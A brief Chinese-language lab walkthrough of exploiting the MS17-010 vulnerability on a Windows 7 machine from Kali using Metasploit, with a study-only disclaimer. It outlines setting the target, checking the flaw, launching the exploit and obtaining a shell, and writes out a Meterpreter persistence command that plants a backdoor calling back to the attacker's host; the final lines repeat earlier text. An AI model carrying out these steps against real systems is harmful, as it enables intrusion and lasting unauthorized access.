注:本文章只用于学习和交流使用,请各位读者切勿利用该漏洞做出出格的事情!!!
实验环境:
kali、win7
启动metasploit控制台调用ms17-010模块
设置目标ip
测试目标是否存在该漏洞
调用exploit模块设置目标ip
设置payload和本地ip开始执行
成功获取shell
维持权限
run persistence -U -i -p 4445 -r 本地ip
ps 查看rscript.exe
kali、win7
成功获取shell
维持权限
run persistence -U -i -p 4445 -r 本地ip
ps 查看rscript.exe